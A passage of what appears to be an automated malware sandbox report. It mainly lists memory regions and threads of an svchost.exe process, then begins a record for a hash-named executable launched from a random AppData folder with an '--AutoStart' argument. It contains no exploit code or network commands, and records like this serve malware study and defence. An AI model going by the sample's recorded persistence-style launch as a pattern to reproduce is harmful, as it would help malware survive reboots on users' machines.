"c:\\windows\\system32\\svchost.exe") Region: id = 1408 start_va = 0x7fef4710000 end_va = 0x7fef472bfff monitored = 0 entry_point = 0x7fef47111a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1409 start_va = 0x7fef4730000 end_va = 0x7fef4791fff monitored = 0 entry_point = 0x7fef4731198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1410 start_va = 0x7fef47a0000 end_va = 0x7fef47d9fff monitored = 0 entry_point = 0x7fef47a1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1411 start_va = 0x7fef47e0000 end_va = 0x7fef48b7fff monitored = 0 entry_point = 0x7fef4848bd0 region_type = mapped_file name = "rasdlg.dll" filename = "\\Windows\\System32\\rasdlg.dll" (normalized: "c:\\windows\\system32\\rasdlg.dll") Region: id = 1412 start_va = 0x7fef48c0000 end_va = 0x7fef491bfff monitored = 0 entry_point = 0x7fef48c8c20 region_type = mapped_file name = "netman.dll" filename = "\\Windows\\System32\\netman.dll" (normalized: "c:\\windows\\system32\\netman.dll") Region: id = 1413 start_va = 0x7fef4b60000 end_va = 0x7fef4deafff monitored = 0 entry_point = 0x7fef4b66f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1414 start_va = 0x7fef8760000 end_va = 0x7fef876bfff monitored = 0 entry_point = 0x7fef876419c region_type = mapped_file name = "apphlpdm.dll" filename = "\\Windows\\System32\\Apphlpdm.dll" (normalized: "c:\\windows\\system32\\apphlpdm.dll") Region: id = 1415 start_va = 0x7fef8770000 end_va = 0x7fef8786fff monitored = 0 entry_point = 0x7fef877d308 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 1416 start_va = 0x7fef87e0000 end_va = 0x7fef885bfff monitored = 0 entry_point = 0x7fef87e11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1417 start_va = 0x7fef8950000 end_va = 0x7fef8a0cfff monitored = 0 entry_point = 0x7fef8951ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 1418 start_va = 0x7fef8f90000 end_va = 0x7fef8ffafff monitored = 0 entry_point = 0x7fef8fd4344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1419 start_va = 0x7fef9000000 end_va = 0x7fef9012fff monitored = 0 entry_point = 0x7fef9001d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1420 start_va = 0x7fef91e0000 end_va = 0x7fef9263fff monitored = 0 entry_point = 0x7fef9231118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1421 start_va = 0x7fef92e0000 end_va = 0x7fef92edfff monitored = 0 entry_point = 0x7fef92e5500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1422 start_va = 0x7fef92f0000 end_va = 0x7fef9316fff monitored = 0 entry_point = 0x7fef92f11a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1423 start_va = 0x7fef9320000 end_va = 0x7fef93f2fff monitored = 0 entry_point = 0x7fef9398b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1424 start_va = 0x7fef9580000 end_va = 0x7fef95f6fff monitored = 0 entry_point = 0x7fef95be7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1425 start_va = 0x7fef9640000 end_va = 0x7fef9661fff monitored = 0 entry_point = 0x7fef9641020 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 1426 start_va = 0x7fef9820000 end_va = 0x7fef982ffff monitored = 0 entry_point = 0x7fef9821010 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 1427 start_va = 0x7fef9830000 end_va = 0x7fef9841fff monitored = 0 entry_point = 0x7fef9831050 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 1428 start_va = 0x7fef9850000 end_va = 0x7fef98a6fff monitored = 0 entry_point = 0x7fef9851118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1429 start_va = 0x7fef98b0000 end_va = 0x7fef98e2fff monitored = 0 entry_point = 0x7fef98b101c region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 1430 start_va = 0x7fef98f0000 end_va = 0x7fef9908fff monitored = 0 entry_point = 0x7fef98f2b50 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 1431 start_va = 0x7fefa720000 end_va = 0x7fefa72ffff monitored = 0 entry_point = 0x7fefa7227f0 region_type = mapped_file name = "uxsms.dll" filename = "\\Windows\\System32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll") Region: id = 1432 start_va = 0x7fefa730000 end_va = 0x7fefa73afff monitored = 0 entry_point = 0x7fefa731198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1433 start_va = 0x7fefa740000 end_va = 0x7fefa766fff monitored = 0 entry_point = 0x7fefa7498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1434 start_va = 0x7fefa810000 end_va = 0x7fefa81afff monitored = 0 entry_point = 0x7fefa814f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1435 start_va = 0x7fefa820000 end_va = 0x7fefa82bfff monitored = 0 entry_point = 0x7fefa8215d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1436 start_va = 0x7fefa840000 end_va = 0x7fefa858fff monitored = 0 entry_point = 0x7fefa8411a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1437 start_va = 0x7fefa8a0000 end_va = 0x7fefa8dcfff monitored = 0 entry_point = 0x7fefa8a1b7c region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 1438 start_va = 0x7fefa8e0000 end_va = 0x7fefa8f4fff monitored = 0 entry_point = 0x7fefa8e60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1439 start_va = 0x7fefa9d0000 end_va = 0x7fefaaf6fff monitored = 0 entry_point = 0x7fefa9d10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1440 start_va = 0x7fefab00000 end_va = 0x7fefab2ffff monitored = 0 entry_point = 0x7fefab1fe98 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 1441 start_va = 0x7fefab30000 end_va = 0x7fefabdbfff monitored = 0 entry_point = 0x7fefab418d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 1442 start_va = 0x7fefac00000 end_va = 0x7fefac08fff monitored = 0 entry_point = 0x7fefac01010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1443 start_va = 0x7fefac10000 end_va = 0x7fefac3bfff monitored = 0 entry_point = 0x7fefac115c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1444 start_va = 0x7fefac40000 end_va = 0x7fefacebfff monitored = 0 entry_point = 0x7fefac56acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1445 start_va = 0x7fefacf0000 end_va = 0x7fefad1cfff monitored = 0 entry_point = 0x7fefacf1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1446 start_va = 0x7fefad20000 end_va = 0x7fefad30fff monitored = 0 entry_point = 0x7fefad214c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1447 start_va = 0x7fefad60000 end_va = 0x7fefad9efff monitored = 0 entry_point = 0x7fefad612c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1448 start_va = 0x7fefaff0000 end_va = 0x7fefb000fff monitored = 0 entry_point = 0x7fefaff1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1449 start_va = 0x7fefb150000 end_va = 0x7fefb184fff monitored = 0 entry_point = 0x7fefb151064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1450 start_va = 0x7fefb1b0000 end_va = 0x7fefb1fafff monitored = 0 entry_point = 0x7fefb1befcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1451 start_va = 0x7fefb620000 end_va = 0x7fefb74bfff monitored = 0 entry_point = 0x7fefb6294bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1452 start_va = 0x7fefb7a0000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb92c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1453 start_va = 0x7fefbe30000 end_va = 0x7fefbe3bfff monitored = 0 entry_point = 0x7fefbe31064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1454 start_va = 0x7fefbff0000 end_va = 0x7fefc00afff monitored = 0 entry_point = 0x7fefbff2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1455 start_va = 0x7fefc010000 end_va = 0x7fefc02dfff monitored = 0 entry_point = 0x7fefc0113b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1456 start_va = 0x7fefc030000 end_va = 0x7fefc041fff monitored = 0 entry_point = 0x7fefc031060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1457 start_va = 0x7fefc160000 end_va = 0x7fefc169fff monitored = 0 entry_point = 0x7fefc163cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1458 start_va = 0x7fefc170000 end_va = 0x7fefc17cfff monitored = 0 entry_point = 0x7fefc171348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1459 start_va = 0x7fefc260000 end_va = 0x7fefc2a6fff monitored = 0 entry_point = 0x7fefc261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1460 start_va = 0x7fefc560000 end_va = 0x7fefc577fff monitored = 0 entry_point = 0x7fefc563b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1461 start_va = 0x7fefc6d0000 end_va = 0x7fefc6f1fff monitored = 0 entry_point = 0x7fefc6d5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1462 start_va = 0x7fefc750000 end_va = 0x7fefc77efff monitored = 0 entry_point = 0x7fefc751064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1463 start_va = 0x7fefc790000 end_va = 0x7fefc7fcfff monitored = 0 entry_point = 0x7fefc791010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1464 start_va = 0x7fefcb00000 end_va = 0x7fefcb0afff monitored = 0 entry_point = 0x7fefcb01030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1465 start_va = 0x7fefcb30000 end_va = 0x7fefcb54fff monitored = 0 entry_point = 0x7fefcb39658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1466 start_va = 0x7fefcb60000 end_va = 0x7fefcb6efff monitored = 0 entry_point = 0x7fefcb61010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1467 start_va = 0x7fefcc10000 end_va = 0x7fefcc4cfff monitored = 0 entry_point = 0x7fefcc118f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1468 start_va = 0x7fefcc50000 end_va = 0x7fefcc63fff monitored = 0 entry_point = 0x7fefcc510e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1469 start_va = 0x7fefcc70000 end_va = 0x7fefcc7efff monitored = 0 entry_point = 0x7fefcc719b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1470 start_va = 0x7fefcd10000 end_va = 0x7fefcd1efff monitored = 0 entry_point = 0x7fefcd11020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1471 start_va = 0x7fefcd20000 end_va = 0x7fefcd8bfff monitored = 0 entry_point = 0x7fefcd22780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1472 start_va = 0x7fefcd90000 end_va = 0x7fefcefcfff monitored = 0 entry_point = 0x7fefcd910b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1473 start_va = 0x7fefcf00000 end_va = 0x7fefcf35fff monitored = 0 entry_point = 0x7fefcf01474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1474 start_va = 0x7fefcf40000 end_va = 0x7fefcf59fff monitored = 0 entry_point = 0x7fefcf41558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1475 start_va = 0x7fefd000000 end_va = 0x7fefd03afff monitored = 0 entry_point = 0x7fefd001324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1476 start_va = 0x7fefd420000 end_va = 0x7fefd486fff monitored = 0 entry_point = 0x7fefd42b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1477 start_va = 0x7fefd490000 end_va = 0x7fefd4dcfff monitored = 0 entry_point = 0x7fefd491070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1478 start_va = 0x7fefd4e0000 end_va = 0x7fefd6e2fff monitored = 0 entry_point = 0x7fefd503330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1479 start_va = 0x7fefd6f0000 end_va = 0x7fefe477fff monitored = 0 entry_point = 0x7fefd76cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1480 start_va = 0x7fefe480000 end_va = 0x7fefe656fff monitored = 0 entry_point = 0x7fefe481010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1481 start_va = 0x7fefe680000 end_va = 0x7fefe7acfff monitored = 0 entry_point = 0x7fefe6ced50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1482 start_va = 0x7fefe7b0000 end_va = 0x7fefe88afff monitored = 0 entry_point = 0x7fefe7d0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1483 start_va = 0x7fefe890000 end_va = 0x7fefe900fff monitored = 0 entry_point = 0x7fefe8a1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1484 start_va = 0x7fefe910000 end_va = 0x7fefe9d8fff monitored = 0 entry_point = 0x7fefe98a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1485 start_va = 0x7fefea60000 end_va = 0x7fefeab1fff monitored = 0 entry_point = 0x7fefea610d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1486 start_va = 0x7fefeb60000 end_va = 0x7fefeb6dfff monitored = 0 entry_point = 0x7fefeb61080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1487 start_va = 0x7fefeb70000 end_va = 0x7fefec46fff monitored = 0 entry_point = 0x7fefeb73274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1488 start_va = 0x7fefec50000 end_va = 0x7fefec6efff monitored = 0 entry_point = 0x7fefec560e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1489 start_va = 0x7fefec70000 end_va = 0x7fefed0efff monitored = 0 entry_point = 0x7fefec725a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1490 start_va = 0x7fefed10000 end_va = 0x7fefee18fff monitored = 0 entry_point = 0x7fefed11064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1491 start_va = 0x7fefef50000 end_va = 0x7fefefe8fff monitored = 0 entry_point = 0x7fefef51c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1492 start_va = 0x7fefeff0000 end_va = 0x7fefeff7fff monitored = 0 entry_point = 0x7fefeff1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1493 start_va = 0x7feff000000 end_va = 0x7feff02dfff monitored = 0 entry_point = 0x7feff001010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1494 start_va = 0x7feff040000 end_va = 0x7feff040fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1495 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 1496 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1497 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 1498 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 1499 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1500 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1501 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1502 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1503 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1504 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1505 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1506 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1507 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1508 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1509 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1510 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1511 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1512 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1513 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1514 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1515 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1516 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1517 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1518 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1519 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1520 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1521 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 87 os_tid = 0x4b0 Thread: id = 88 os_tid = 0x120 Thread: id = 89 os_tid = 0x694 Thread: id = 90 os_tid = 0x610 Thread: id = 91 os_tid = 0x48c Thread: id = 92 os_tid = 0x184 Thread: id = 93 os_tid = 0x568 Thread: id = 94 os_tid = 0xc8 Thread: id = 95 os_tid = 0x630 Thread: id = 96 os_tid = 0x7c8 Thread: id = 97 os_tid = 0x680 Thread: id = 98 os_tid = 0x5c8 Thread: id = 99 os_tid = 0x1c4 Thread: id = 100 os_tid = 0xf8 Thread: id = 101 os_tid = 0x3e8 Thread: id = 102 os_tid = 0x3dc Thread: id = 103 os_tid = 0x3d8 Thread: id = 104 os_tid = 0x3c8 Thread: id = 105 os_tid = 0x3c4 Thread: id = 106 os_tid = 0x390 Thread: id = 107 os_tid = 0x380 Thread: id = 108 os_tid = 0x378 Thread: id = 109 os_tid = 0x360 Thread: id = 110 os_tid = 0x348 Thread: id = 111 os_tid = 0x338 Thread: id = 121 os_tid = 0xc98 Process: id = "10" image_name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" page_root = "0x13993000" os_pid = "0x6f8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x644" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fdbe" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1664 start_va = 0x10000 end_va = 